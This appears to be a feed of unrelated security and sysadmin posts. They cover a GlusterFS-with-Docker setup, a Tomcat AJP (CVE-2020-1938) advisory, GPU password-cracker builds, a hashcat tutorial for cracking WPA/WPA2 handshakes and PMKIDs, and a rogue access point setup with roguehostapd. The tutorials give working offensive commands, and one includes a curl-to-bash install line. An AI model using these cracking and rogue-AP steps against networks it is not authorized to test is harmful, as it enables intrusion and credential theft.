    Documentation for using Gluster can be found on their docs . Their installation instructions are very brief and explain how to install the gluster packages, but they don’t go into depth in how to setup a Gluster network. I also suggest thoroughly reading through to documentation to understand Gluster volumes, bricks, pools, etc.

    Installing GlusterFS

    To begin you will need to list all of the Docker Swarm nodes you wish to connect in the /etc/hosts files of each server. On linux (Debian/Ubuntu), you can get the current nodes IP Address run the following command hostname -I | awk '{print $1}'

    (The majority of the commands listed below need to be ran on each and every node simultaneously unless specified. To do this I opened a number of terminal tabs and connected to each server in a different tab.)

    # /etc/hosts
    10.10.10.1 staging1.example.com staging1
    10.10.10.2 staging2.example.com staging2
    10.10.10.3 staging3.example.com staging3
    10.10.10.4 staging4.example.com staging4
    10.10.10.5 staging5.example.com staging5
    # Update & Upgrade all installed packages
    apt-get update && apt-get upgrade -y
    
    # Install gluster dependencies
    sudo apt-get install python-software-properties -y

    Add the GlusterFS PPA package the list of trusted packages to install from a community repository.

    sudo add-apt-repository ppa:gluster/glusterfs-3.10;
    sudo apt-get update -y && sudo apt-get update

    Now lets install gluster

    sudo apt-get install -y glusterfs-server attr

    Now before starting the Gluster service but I had to copy some files into systemd (you may or may not have to do this). But since Gluster was developed by RedHat primarily for RedHat and CentOS, I had a few issues starting the system service.

    sudo cp /etc/init.d/glusterfs-server /etc/systemd/system/

    Let’s start and enable the glusterfs system service

    systemctl enable glusterfs-server; systemctl start glusterfs-server

    This step isn’t necessary, but I like to verify that

    # Verify the gluster service is enabled
    systemctl is-enabled glusterfs-server
    # Check the system service status of the gluster-server
    systemctl status glusterfs-server

    If for some reason you haven’t done this yet, each and every node should have it’s own ssh key generated.

    (The only reason I can think of why they wouldn’t have a different key is if a VM was provisioned and than cloned for similar use across a swarm.)

    # This is to generate a very basic SSH key, you may want to specify a key type such as ED25519 or bit length if required.
    ssh-keygen -t rsa

    Dependant on your Docker Swarm environment and which server you’re running as a manager; you’ll probably want one of the node managers to also be a gluster node manager as well. I’m going to say server staging1 is one of our node managers, so on this server we’re going to probe all other gluster nodes to add them to the gluster pool. (Probing them essentially is saying this manager is telling all servers on this list to connect to each-other.)

    gluster peer probe staging1; gluster peer probe staging2; gluster peer probe staging3; gluster peer probe staging4; gluster peer probe staging5;

    It’s not required, but probably good practice to ensure all of the nodes have connected to the pool before setting up the file system.

    gluster pool list
    
    # => You should get results similar to the following
    UUID					Hostname 	State
    a8136a2b-a2e3-437d-a003-b7516df9520e	staging3 	Connected
    2a2f93f6-782c-11e9-8f9e-2a86e4085a59	staging2 	Connected
    79cb7ec0-f337-4798-bde9-dbf148f0da3b	staging4 	Connected
    3cfc23e6-782c-11e9-8f9e-2a86e4085a59	staging5 	Connected
    571bed3f-e4df-4386-bd46-3df6e3e8479f	localhost	Connected
    
    # You can also run the following command to another set of results
    gluster peer status

    Now lets create the gluster data storage directories (It’s very important you do this on every node. This is because this directory is where all gluster nodes will store the distributed files locally.)

    sudo mkdir -p /gluster/brick

    Now lets create a gluster volume across all nodes (again run this on the master node/node manager).

    sudo gluster volume create staging-gfs replica 5 staging1:/gluster/brick staging2:/gluster/brick staging3:/gluster/brick staging4:/gluster/brick staging5:/gluster/brick force

    The next step is to initialize the glusterFS to begin synchronizing across all nodes.

    gluster volume start staging-gfs

    This step is also not required, but I prefer to verify the gluster volume replicated across all of the designated nodes.

    gluster volume info

    No let’s ensure we have gluster mount the /mtn directory for it’s shared directory especially on a reboot. (It’s important to run these commands on all gluster nodes.)

    sudo umount /mnt
    sudo echo 'localhost:/staging-gfs /mnt glusterfs defaults,_netdev,backupvolfile-server=localhost 0 0' >> /etc/fstab
    sudo mount.glusterfs localhost:/staging-gfs /mnt
    sudo chown -R root:docker /mnt

    (You may have noticed the setting of file permissions using [i]chown -R root:docker this is to ensure docker will have read/write access to the files in the specified directory.)[/i]

    If for some reason you’ve already deployed your staging gluster-fs and need to remount the staging-gfs volume you can run the following command. Otherwise you should be able to skip this step.

    sudo umount /mnt; sudo mount.glusterfs localhost:/staging-gfs /mnt; sudo chown -R root:docker /mnt

    Let’s list all of our mounted partitions and ensure that the staging-gfs is listed.

    df -h
    
    # => staging-gfs should be listed in the partitions/disks listed
    localhost:/staging-gfs              63G   13G   48G  21% /mnt

    Now that all of the work is pretty much done, now comes the fun part lets test to make sure it all works. Lets cd into the /mnt directory and create a few files to make sure they will sync across all nodes. (I know this is one of the first things I wanted to try out.) You can do one of the following commands to generate a random file in the /mnt directory. Now depending on your servers and network connections this should sync up across all nodes almost instantly. The way I tested this I was in the /mtn directory on several nodes in several terminals. And as soon as I issued the command I was running the ls command in the other tabs. And depending on the file size, it may not sync across all nodes instantly, but is at least accessible.

    # This creates a 24MB file full of zeros
    dd if=/dev/zero of=output.dat bs=24M  count=1
    
    # Creates a 2MB file of random characters
    dd if=/dev/urandom of=output.log bs=1M count=2

    Using GlusterFS with Docker

    Now that all the fun stuff is done if you have looked at docker volumes or bind mounts this would probably be a good time. Usually docker will store a volumes contents in a folder structure similar to the following: /var/lib/docker/volumes/DogTracker/_data.

    But in your docker-compose.yml or docker-stack.yml you can specify specific mount points for the docker volumes. If you look at the following YAML snippet you will notice I’m saying to store the containers /opt/couchdb/data directory on the local mount point /mnt/staging_couch_db.

    version: '3.7'
    services:
      couchdb:
      image: couchdb:2.3.0
      volumes:
       - type: bind
         source: /mnt/staging_couch_db
         target: /opt/couchdb/data
      networks:
        - internal
      deploy:
        resources:
          limits:
            cpus: '0.30'
            memory: 512M
          reservations:
            cpus: '0.15'
            memory: 256M

    Now as we had previously demonstrated any file(s) saved, created, and/or deleted in the /mtn directory will be synchronized across all of the GlusterFS nodes.

    I’d just like to mention this may not work for everyone, but this is the method that worked best for use. We’ve been running a number of different Gluster networks for several months now with no issues thus far.

  5. Tue Mar 3 10:38:52 2020

    Recently, a new vulnerability on Apache Tomcat AJP connector was disclosed.

    The flaw was discovered by a security researcher of Chaitin Tech [1] and allows a remote attacker to read any webapps files or include a file.

    The AJP Connector

    The AJP Connector [3] is generally used to manage (internal) requests, usually on port 8009, coming for example from an Apache HTTP Server.
    The vulnerability (CVE-2020-1938) could be remotely exploited if port 8009 is publicly exposed.

    defaultAccording to a tweet by Joao Matos [2], the vulnerability is not a default RCE (Remote Command Execution), but a LFI (Local File Inclusion) that can be turner in RCE:

    CVE-2020-1938 is NOT a default Remote Code Execution vul. It is a LFI. So, IF you can:

    1. upload files via an APP feature &
    2. these files are saved inside the document root (eg. webapps/APP/… &
    3. reach the AJP port directly;

    Thus, it can be turned in RCE.

    A Proof-of-Concept for the vulnerability has been realeased on Github, without any additional details.
    Furthermore, researcher also published an “online detection tool” useful to remotely check vulnerability.

    [attachment:5e5dd0b43629b]

    Which Tomcat versions are affected?

    • Tomcat 6 (no longer maintained)
    • Tomcat 7.x < 7.0.100
    • Tomcat 8.x < 8.5.51
    • Tomcat 9.x < 9.0.31

    Is there a fix?

    Apache Tomcat has officially released versions 9.0.31, 8.5.51, and 7.0.100 to fix this vulnerability.
    To fix this vulnerability correctly, you first need to determine if the Tomcat AJP Connector service is used in your server environment:
    –If no cluster or reverse proxy is used, you can basically determine that AJP is not used.
    –Otherwise, you need to figure out if the cluster or reverse server is communicating with the Tomcat AJP Connector service.

    For additional details about fixing, please refer to the advisory.
    As usual, update ASAP (and check port 8009 exposure)!

    References

  6. 6 weeks ago
    Tue Feb 11 20:56:03 2020
    Men in Black started the conversation How to build a (2nd) 8 GPU password cracker.

    [attachment:5e42b0e46185a]

    Background

    In February 2017, we took our first shot at upgrading our old open-frame 6 GPU cracker (NVIDIA 970). It served us well, but we needed to crack 8 and 9-character NTLM hashes within hours and not days. The 970s were not cutting it and cooling was always a challenge. Our original 8 GPU rig was designed to put our cooling issues to rest.

    Speaking of cooling issues, we enjoyed reading all of the comments on our 2017 build. Everyone seemed convinced that we were about to melt down our data center. We thank everyone for their concern (and entertainment).

    • "the graphics cards are too close!"
    • "nonsense. GTX? LOL. No riser card? LOL good luck."

    To address cooling, we specifically selected (at the time) NVIDIA 1080 Founders Edition cards due to their 'in the front and out the rear' centrifugal fan design. A couple months after our initial blog, we upgraded from NVIDIA 1080 to NVIDIA 1080 Ti cards. And admitedly, we later found that more memory was useful when cracking with large (>10GB) wordlists.

    OK, But Why?

    Shortly after building our original 8 GPU cracker, we took it to RSA and used it as part of a narrated live hacking demo. Our booth was a play on the Warlock’s command center where we hacked Evil Corp from the comfort of Ma’s Basement. (yeah, a bit unique for RSA…)

    [attachment:5e42b14ad8bd1]

    Shopping List

    You have a little flexibility here, but we’d strongly suggest the Tyan chassis and Founders Edition NVIDIA cards. The Tyan comes with the motherboard, power supplies (3x), and arrives all cabled up and ready to build. We went with a 4TB SSD to hold some very large wordlists but did not setup RAID with a 2nd drive (yet). Higher CPU speeds and memory mostly help with dictionary attacks; therefore a different build may be better suited for non-GPU cracking.
    Hardware

    • Tyan B7079F77CV10HR-N
    • 2x Intel Xeon E5-2630 V4 Broadwell-EP 2.2 GHz (LGA 2011-3 85W)

    +Be sure to get V3 or V4 (V4 recommended to support DDR4 2400 RAM)! *We learned the hard way!

    • 128GB (4 x 32GB) DDR4 2400 (PC4 19200) 288-Pin 1.2V ECC Registered DIMM
    • Samsung EVO 4TB 2.5” SSD

    Software

    • Ubuntu - 18.04 LTS server (x64)
    • hashcat - www.hashcat.net
    • hashview - www.hashview.io

    Cost

    • Depends heavily on the current market price of GPUs. ($12K-$17K)
    • At least the software is all free! And who can put a price on cracking performance?

    The Build

    Despite being a hash munching monster and weighing nearly 100 lbs. when assembled, this build is easy enough for novice.

    [attachment:5e42b1b6577c8]

    Hardware Build Notes

    • Normally I like to install the CPU(s) first, but I ordered the wrong ones and had to install them 3 days later. Be sure to get V3 or V4 XEON E5 processors, V2 is cheaper but ‘it don’t fit’.

    +When installing the (included) Tyan heat-sinks, we added a little extra thermal paste even through the heat-sinks already have some on the bottom.

    • Install memory starting in Banks A and E (see diagram above). CPU 0 and CPU 1 each require matching memory. Memory Banks A-D are for CPU 0 and Memory Banks E-H are for CPU 1. We added 2x 32GB in Bank A and 2x 32GB in Bank E for a total of 128GB RAM.
    • Install hard drive for (Linux) operating system. We chose a 4TB SSD drive to ensure plenty of storage for large wordlists and optimum read/write performance. The chassis has 10 slots so feel free to go crazy with RAID and storage if you wish.
    • Prep all 8 GPU cards by installing the included Tyan GPU mounting brackets. They are probably not required, but they ensure a good seat.
    • Install GPU cards. Each NVIDIA 1080 Ti requires 2 power connections per card. The regular 1080 cards only require 1 if you decide not to go the ‘Ti’ route. Again, Tyan includes all necessary power cables with the chassis.
    • Connect or insert OS installation media. I hate dealing with issues related to booting and burning ISOs written to USB flash; so we went with a DVD install (USB attached drive).
    • Connect all 3 power cords to the chassis and connect the other end of each cord to a dedicated 15A or 20A circuit. While cracking, the first 2 power supplies draw 700-900W with a less on the 3rd. They do like dedicated circuits though, it is easy to trip breakers if anything else is sharing the circuit.

    Software Build Notes

    Everyone has their own preferred operating system and configuration, so we’ve decided not to go telling you how to do your thing. If you are new to installing and using a Linux operating system, we did include a complete walk-through in our February 2017 post: How to build a 8 GPU password cracker.

    The basic software build steps are as follows:

    • Install your preferred Linux OS. We chose Ubuntu 18.04 LTS (64 bit - server). Fully update and upgrade.
    • Prepare for updated NVIDIA drivers:

    +Blacklist the generic NVIDIA Nouveau driver

    sudo bash -c "echo blacklist nouveau > /etc/modprobe.d/blacklist-nvidia-nouveau.conf"
    sudo bash -c "echo options nouveau modeset=0 >> /etc/modprobe.d/blacklist-nvidia-nouveau.conf"
    sudo update-initramfs -u
    sudo reboot

    +Add 32-bit headers

    sudo dpkg --add-architecture i386
    sudo apt-get update
    sudo apt-get install build-essential libc6:i386

    +Download, unzip and install the latest NVIDIA driver from http://www.nvidia.com/Download/index.aspx

    [attachment:5e42b2434baa9]

    sudo ./NVIDIA*.run
    sudo reboot

    The Outcome

    Go ahead, run a benchmark with hashcat to make sure everything works!

    ./hashcat-5.0.0/hashcat64.bin -m 1000 -b

  7. Tue Feb 11 20:46:34 2020
    Men in Black started the conversation How to build a 8 GPU password cracker.

    TL;DR

    This build doesn't require any "black magic" or hours of frustration like desktop components do. If you follow this blog and its parts list, you'll have a working rig in 3 hours. These instructions should remove any anxiety of spending 5 figures and not knowing if you'll bang your head for days.

    The Goal

    Upgrade our current rig from 6 gtx 970s to 8 gtx 1080. Don't blow a fuse.

    Parts list

    Hardware

    • Chassis & Motherboard - Tyan Ft77C-B7079 (P/N: B7079F77CV10HR-N)
    • CPU - 2 Xeon E5-2620V3 LGA2011 (dont purchase one CPU, 2 are required to control all PCIE slots)
    • Memory - 2 32g DDR4 PC2400 288pin LRDIMM
    • Hard drive - 1tb Samsung SSD 850 EVO
    • GPUs - 8 EVGA gtx1080 founders edition (whatever you get, make sure its a founders edition. Sometimes called a reference card/edition)

    Software

    • Ubuntu - 14.04.3 server (x64)
    • hashcat - www.hashcat.net
    • hashview - www.hashview.io

    Assembly

    Nowadays building mid-grade to high-end password crackers is like playing with legos, albeit expensive legos.

    We did a time lapse of the build:

    Build notes

    There are few things we learned during the purchasing and assembly.

    • You don't need to purchase a separate heatsink and fan for your CPUs. The Tyan chassis will come with them.
    • Tyan chassis comes with brackets that screw into the back of you GPUs to secure them in place. These may not be needed if you never move the box, but it doesn't hurt to install them. We did.
    • Rails are included with the Tyan.
    • This chassis doesn't appear to have a onboard hardware raid. I just assumed it would :-(
    • BIOs didn't require any modifications or flashing. Came fully updated as of January 2017.
    • We disabled the system speaker because it will scream at you if you don't have all three power supplies plugged in.

    [attachment:5e42aeb654b0d]

    In the image below you can see the brackets that attach to the rear of the GPU for added support. Probably not needed but if you were to ship this rig I'd install them. This thing is HEAVY!

    [attachment:5e42aedc56abc]

    [attachment:5e42aedc5315d]

    [attachment:5e42aedc4fad6]

    [attachment:5e42aedc7c4f8]

    [attachment:5e42aedd0a957]

    [attachment:5e42aedd0e7c9]

    Software Install

    We had no hardware issues but we installed one GPU, booted the system, and once we verified it could POST with no issues, we started installing the OS. Once Ubuntu finished installing, we later reinstalled all GPUs. Since things went so smoothly, next time I'd just fully install all GPUs and fire it up. Nothing to worry about.

    Install Ubuntu 14.04.3 Server (x64)

    Not going to cover this in detail. But here are few things we considered.

    1.Use LVM
    2.We chose not to encrypt whole disk or home directory. We generally make an encrypted volume later.
    3.Choose 'OpenSSH Server' from software selection screen (one less step post install)

    Once OS is installed, verify GPUs are detected by OS:

    lspci | grep VGA

    Update and install dependencies for drivers and hashcat

    sudo apt-get update && apt-get upgrade
    sudo apt-get install gcc make p7zip-full git lsb-core

    Download and install Nvidia drivers and Intel OpenCL runtime

    Download Nvidia drivers. Nvidia 375.26 was current at the time of this build (January 2017).

    UPDATE 4/10/2017 - If using 1080 Ti, use driver 378.13

    wget http://us.download.nvidia.com/XFree86/Linux-x86_64/375.26/NVIDIA-Linux-x86_64-375.26.run
    chmod +x NVIDIA-Linux-x86_64-375.26.run
    sudo ./NVIDIA-Linux-x86_64-375.26.run

    If you get warning messages about x86 you can ignore them. Here's an example of one:

    WARNING: Unable to find a suitable destination to install 32-bit compatibility libraries. Your system may not be set up for 32-bit compatibility. 32-bit compatibility files will not be installed; if you wish
    [Cto install them, re-run the installation and set a valid directory with the --compat32-libdir option

    Install OpenCL runtime (not required but why not, use those CPUs too)

    wget http://registrationcenter-download.intel.com/akdlm/irc_nas/9019/opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25.tgz
    tar -xvf opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25.tgz
    cd opencl_runtime_16.1.1_x64_ubuntu_6.4.0.25
    ./install.sh 

    Install hashcat - www.hashcat.net

    wget https://hashcat.net/files/hashcat-3.30.7z
    7z x hashcat-3.30.7z
    cd hashcat-3.30

    Test hashcat by running a benchmark...at 341 GH/s!!!!

    meatball@kraken3:~/hashcat-3.30$ ./hashcat64.bin -m 1000 -b
    hashcat (v3.30) starting in benchmark mode...
    
    OpenCL Platform #1: NVIDIA Corporation
    ======================================
    * Device #1: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
    * Device #2: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
    * Device #3: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
    * Device #4: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
    * Device #5: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
    * Device #6: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
    * Device #7: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
    * Device #8: GeForce GTX 1080, 2028/8113 MB allocatable, 20MCU
    Hashtype: NTLM
    Speed.Dev.#1.....: 42896.1 MH/s (62.48ms)
    Speed.Dev.#2.....: 42604.1 MH/s (62.97ms)
    Speed.Dev.#3.....: 42799.0 MH/s (62.57ms)
    Speed.Dev.#4.....: 42098.9 MH/s (63.68ms)
    Speed.Dev.#5.....: 42871.5 MH/s (62.57ms)
    Speed.Dev.#6.....: 42825.0 MH/s (62.64ms)
    Speed.Dev.#7.....: 42848.9 MH/s (62.54ms)
    Speed.Dev.#8.....: 42449.8 MH/s (63.16ms)
    Speed.Dev.#*.....:   341.4 GH/s
    Started: Mon Feb 13 17:54:12 2017
    Stopped: Mon Feb 13 17:54:31 2017

    Install hashview - www.hashview.io

    Install dependencies

    sudo apt-get update
    sudo apt-get install mysql-server libmysqlclient-dev redis-server openssl
    mysql_secure_installation

    Optimize the database

    vim /etc/mysql/my.conf

    Add the following line under the [mysqld] section:

    innodb_flush_log_at_trx_commit  = 0

    Restart mysql

    service mysql restart

    Install RVM - (commands below are from https://rvm.io/rvm/install)

    gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
    \curl -sSL https://get.rvm.io | bash -s stable --ruby

    Download and setup Hashview

    git clone https://github.com/hashview/hashview
    cd hashview

    Install gems (from Hashview directory)

    rvm install ruby-2.2.2
    gem install bundler
    bundle install

    Setup database connectivity

    cp config/database.yml.example config/database.yml
    vim config/database.yml

    Create database

    RACK_ENV=production rake db:setup

    In another terminal or screen session, kick off resque

    RACK_ENV=production TERM_CHILD=1 QUEUE=* rake resque:work

    note: In production mode no output will be displayed until a job has started

    Run Hashview

    RACK_ENV=production ruby hashview.rb

    Crack Hashes

    Start a job and start cracking!

    [attachment:5e42b01e7223d]

    Then intensely watch analytics in realtime while sipping on your favorite cocktail
    [attachment:5e42b029043ed]

    Stay tuned...

    We just bought our second 8 GPU rig! In a future post we'll show you how to easily support distributed cracking using Hashview.

  8. 7 weeks ago
    Sun Feb 9 21:34:18 2020

    [attachment:5e4015df6b568]

    WPA/WPA2 cracking has been a focus point in the community since many years. And we have tools to aim that focus like aircrack and hashcat . Some new advancements have been made to aid that focus in the past couple of years.

    So, Cracking WPA/WPA2 has been quite a topic now. In this tutorial, we are going to cover one of the infamous tools "hashcat" for cracking WPA/WPA2.

    Hashcat which is primarily built for brute forcing different kind of hashes using different kind of attack vectors, supports cracking for two of badly known WPA/WPA2 attacks. Well, for the list of available hashes, you can check the hash modes section in the manual:

    [attachment:5e40164e00267]

    In previous, you might have seen or even worked with aircrack to crack WPA/WPA2 by capturing a 4-way handshake. But that was not anywhere close to how perfect could this tool be for the purpose. Besides, hashcat is a GPU + CPU maintained tool which makes it a lot more faster.

    In short, if you own a GPU, always go for hashcat or else you could use an online service or buy out some GPU based server on Internet.

    We will cover up with two famous WPA/WPA attacks, precisely the cracking of MIC (4-way handshake) and PMKID (1st packet/handshake). So, let's begin.

    Installation

    Hashcat is built to work on Windows, Linux and as well as on Mac. You can go to hashcat.net and download the binaries and follow the instruction for your operating system. What we are going to do here is clone a fresh copy of hashcat from github and manually install it on a debain based linux.

    Preferably, you should use Kali Or Parrot but a similar distro like Ubuntu will work as well.

    Update Your Repo's and install the following dependencies:

    $ apt update
    $ apt install git build-essential ocl-icd-libopencl1 libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev -y

    Clone hashcat from github and move to directory:

    $ git clone https://github.com/hashcat/hashcat.git
    $ cd hashcat/

    Finally, compile the binaries and we are all set with hashcat.

    $ git submodule update --init
    $ sudo make && sudo make install

    [attachment:5e4016876cead]

    You may try printing the help manual for hashcat to check whether you have it installed perfectly or not.

    $ hashcat --help

    [attachment:5e40169fdfb52]

    Hcxtools:

    Now, let's clone and compile hcxtools from github. It is basically a set of various files to convert and generate another version of the supplied input. We will use it to convert the captured traffic into a format understandable by hashcat.

    First, clone the repo and move the hcxtools directory:

    $ git clone https://github.com/ZerBea/hcxtools.git
    $ cd hcxtools/

    And finally, run the make command to compile binaries and make necessary changes in path.

    $ sudo make && sudo make install

    [attachment:5e4016c531cf7]

    After having the requirements installed, we move to the cracking part. Below this, i am dividing the tutorial into two parts, first we will crack the WPA/WPA2 using MIC aka 4-way handshake. While in second, i'll do cracking using PMKID.

    PART A

    Let's clear how the MIC cracking actually works. So, in this case, we need a valid 4-way handshake. The handshake consists of many keys that are interchanged during the authentication between the client and access point.

    These independent keys are used to generate a common key named "Message Integrity Code (MIC)". This generated MIC is used to validate the given password by cracker.

    STEP 1

    Conversion to hccapx format

    Supposing you already have a captured 4-way handshake using some tool like airodump, but you still need the proper format to supply it to hashcat. To convert it to a proper format (hccapx), you need another tool.

    There are already some online services that you may use: https://hashcat.net/cap2hccapx/

    But still in case you are wondering to do it locally, clone the hashcat-utils repo from github:

    $ git clone https://github.com/hashcat/hashcat-utils.git
    $ cd hashcat-utils/src

    Finally, compile the binaries. After compiling, you will have the binaries under same directory. The binary file that we need is cap2hccapx.bin. To make sure, you have it correctly compiled, try to execute the file, it will throw you back the syntax:

    $ sudo make
    $ ./cap2hccapx.bin

    [attachment:5e401718c32c8]

    So, after having it installed, use the below given syntax to convert the .cap file to .hccapx hashcat capture format.

    $ ./capt2hccapx.bin /path/tp/capfile.cap hashfile.hccapx

    [attachment:5e401732044ce]

    So, this will generate a file by the name "hashfile.hccapx", which is what we are going to use with hashcat. Now, you may move to whatever directory you want, since will be cracking the final format now.

    STEP 2

    Cracking WPA/WPA2 (handshake) with hashcat

    With hashcat, there is a possibily of various attack vectors. We could do a straight dictionary attack, brute-force attack, combinator attack or even masks attack, i.e. making rules to find various possibilities of trying different characters at different positions.

    Anyhow, let's study the actual cracking of WPA/WPA2 handshake with hashcat.

    Dictionary Attack:

    As named, you need a wordlist for it to work. Considering you have solid list of possible wifi passphrases, or if not, you can download the famous ones: https://www.wirelesshack.org/wpa-wpa2-word-list-dictionaries.html

    Launch the following command for dictionary attack:

    $ hashcat -a 0 -m 2500 hashfile.hccapx /path/to/dict.txt

    [attachment:5e40175a6faf0]

    -a: specifies cracking mode. In our case it's dictionary mode and "/path/to/dict.txt" is complete path to the wordlist.

    • m: hash mode. Specifies what type of hash we are dealing with.

    In Case You Receive issues regarding Intel CPU or "No devices found/left", use --force argument to force the usage of your device.

    Brute-Force Attack:

    The Brute-force is different than the dictionary attack. Here, we try to replace every character at every possible position in a specified length from a given charset. For example, in a string of length 8, we can try every character from A-Z at every postion in this string.

    That's how brute-forcing works and hence very time-consuming. Launch the following command to start your first attempt for brute-forcing:

    $ hashcat -m 2500 -a 3 hashfile.hccapx ?d?d?d?d?d?d?d?d

    [attachment:5e40177e5163a]

    -a: specifies the cracking mode and here the value 3 indicates, we are running a brute-force attack.
    ?d?d?d?d?d?d?d?d: is the brute-forcing rule here. It specifies what kind of values to check, where to replace and also assumes how much time could it take to crack the key.

    The above mask i.e. "?d?d?d?d?d?d?d?d" states to check a string of length 8 with a digit at every position. You can study about mask attack here: Hashcat Mask Attack .

    PART B

    Part A was about the handshake cracking. Whilst now, we are going to crack PMKID with hashcat. The PMKID is located in the 1st packet of 4-way handshake and hence it's kind of more useful because we don't need a complete handshake.

    The algorithm to compute PMKID is given which is quite easier than that of MIC.

    PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

    Let the cracking begin for PMKID.

    STEP 1

    Getting the PMKID hash

    The first thing to proceed with PMKID cracking is the pmkid hash. To generate it we need the first packet of the 4-way handshake. Considering you already have that, we will extract the hash from the captured file.

    Let's do the conversion. Execute the below command

    $ hcxpcaptool -z pmkid.hash /path/to/capture.cap

    [attachment:5e4017ec9df19]

    This will generate a file by the name pmkid.hash that we will use with hashcat to do the cracking.

    STEP 2

    Cracking WPA/WPA2 (PMKID) with hashcat

    Just like previous part, we will apply the same rules here except for the hash mode argument. The hash mode value for PMKID cracking is 16800.

    Dictionary Attack:

    As per syntax we have back in the PART A section for dictionary attack, we will use that very same syntax except for the -m argument which defines what kind of hash we want to crack. We will be cracking pmkid (16800) this time.

    $ hashcat -a 0 -m 16800 pmkid.hash /path/to/wordlist.txt

    [attachment:5e401825d6a92]

    While this would crack the key by looping through each line given in the wordlist.

    Brute-Force Attack:

    We will do same here as last section i.e. providing a mask to crack the hash. This time, just to show how powerful these masks could be, i'll use a different one. So, execute the command for brute-force attack:

    $ hashcat -a 3 -m 16800 pmkid.hash ?l?l?l?l?l?l?l?l

    [attachment:5e40184664b72]

    The above mask will create combinations of string of length 8 with every alphabet at every possible position. And this sounds like a huge combination that may take a lot of time to complete. To make the attack more faster, we can use the GPU.

    CPU/GPU

    Now, getting into CPU/GPU thing, we just need to know that GPU is a lot more faster than CPU and hashcat have the ability to do cracking on your GPU. Hashcat has following three device modes which can be changed via -d argument:

    • 1: CPU which is by default, selected.
    • 2: GPU
    • 3: DSP, Co-processor.

    You can use one of these devices according to what's more suitable for you. For example,

    $ hashcat -a 3 -m 16800 -d 2 pmkid.hash /path/to/wordlist.txt

    To accomplish PMKID attack on GPU. That's it, i.e. cracking WPA/WPA2 via hashcat.

    Conclusion

    The conclusion that can be drawn out of all above is that hashcat is not just limited for a number of hashes, infact it's applicable to a wide range of hashes and other possibilities including mixes and concatenated strings. We learned to crack WPA/WPA2 using hashcat.

    Besides, hashcat is known of it's power, stability and speed by operating on GPU. It also gives us the possibility of mask attack which let us play with possibilities of testing thousand of thousands strings against the hash.

  9. Sun Feb 9 21:15:39 2020

    [attachment:5e4012e1d13a5]

    Hosting a wireless access point is rather easy on windows and android as compared to those of based on debian and other linux distros. In this sceneario you would have to provide every single detail youself by configuring packages and writing configuration. Well, in windows there are just a couple commands to accomplish the task and as for android, it's hotspot. Approaching this in linux would be a bit tricky and as for new commers perplexing.

    The widely accepted tool for the purpose is hostapd which we have also used in some of the earlier tutorials. Lately, developers of wifiphisher developed a small tool that could tackle the problem of handling hostapd configuration in a more robust way. And later, it was used in wifiphisher and was named roguehostapd (a modified version of hostapd). The developers record that some previous known errors were removed in newer version and also supports some other wireless attacks as well.

    Roguehostapd provides a simple CLI interface with argument options to deal with user requirements, just like a normal command line tool. It also supports karma attack where an attacker provides it's users internet connectivity but still own's the actual arena. However, note that we will still have to configure a DHCP server for which we will use dnsmasq.

    STEP 1

    Installation

    Dnsmasq can easily be installed with apt, however that's not the case with roguehostapd. Update your system and install pre-requisities.

    $ apt update
    $ apt install libnl-3-dev libnl-genl-3-dev libssl-dev dnsmasq

    To make roguehostapd work as a usual tool, we will have to manually place it under some directory and produce a link to an execution directory. Move to /opt directory and clone the tool from github:

    $ cd /opt/
    $ git clone https://github.com/wifiphisher/roguehostapd.git
    $ cd roguehostapd/roguehostapd/
    $ ls -l

    And finally create the soft link to command execution directory:

    $ ln -s /opt/roguehostapd/roguehostapd/run.py /usr/bin/rghostapd

    We've followed this way of installation to install it as a normal command utility. To integrate it with wifiphisher, it can be done with a single command:

    $ pip install roguehostapd

    STEP 2

    Monitor Mode

    Put your wireless card in monitor mode:

    $ airmon-ng start wlan1

    STEP 3

    Wireless Access Point

    The manual for roguehostapd can be issued from CLI now:

    $ rghostapd --help

    [attachment:5e4013645d4e4]

    To launch wireless access point with rghostapd, execute the following command:

    $ rghostapd -i "wlan1mon" --ssid "WiFi Name" -c 6 -pK "password"

    -i, --interface: Monitor Mode interface to host AP on.

    • c, --channel: Access Point Channel.
    • -ssid: Wireless Access Point ESSID or Name.
    • pK, --wpa2password: Access Point WPA password.

    [attachment:5e401401f0a10]

    STEP 4

    DHCP server

    Since, we have our Access Point, all we need is a DHCP server to let the actual traffic flow through our network. We have dnsmasq for this part. Create a temporary configuration file for dnsmasq with nano:

    $ nano /tmp/dnsmasq.conf

    And write the following configurations into the file with the wireless interface replaced with your interface:

    interface=wlan1mon
    dhcp-range=192.168.1.2,192.168.1.30,255.255.255.0,12h
    dhcp-option=3,192.168.1.1
    dhcp-option=6,192.168.1.1
    server=8.8.8.8
    log-queries
    log-dhcp
    listen-address=127.0.0.1

    Press CTRL+X and then ENTER to save the file. Then execute the following two commands to assign reqired ip and netmask to your interface:

    $ ifconfig wlan1mon up 192.168.1.1 netmask 255.255.255.0
    $ route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1

    Then for sure, kill dnsmasq process if any running already on your system:

    $ killall dnsmasq

    And finally, start dnsmasq:

    $ dnsmasq -C /tmp/dnsmasq.conf -d

    [attachment:5e4013f3ea6e2]

    STEP 5

    IP Forwarding

    And finally the last thing is providing the Access Point users with internet facility. For this we need another wired or wireless interface from where traffic will be forwarded to our Access Point interface. I've got two wireless adapters, one is connected to internet (wlan0) and the other on which currently I've an access point (wlan1mon).

    Just execute the following commands with the bold words replaced by your respective interfaces:

    $ iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    $ iptables --append FORWARD --in-interface wlan1mon -j ACCEPT

    And at last, allow the traffic forwarding rules in linux configuration:

    $ echo 1 > /proc/sys/net/ipv4/ip_forward

    After this, you will have your access point on duty to serve it's users.

    Conclusion

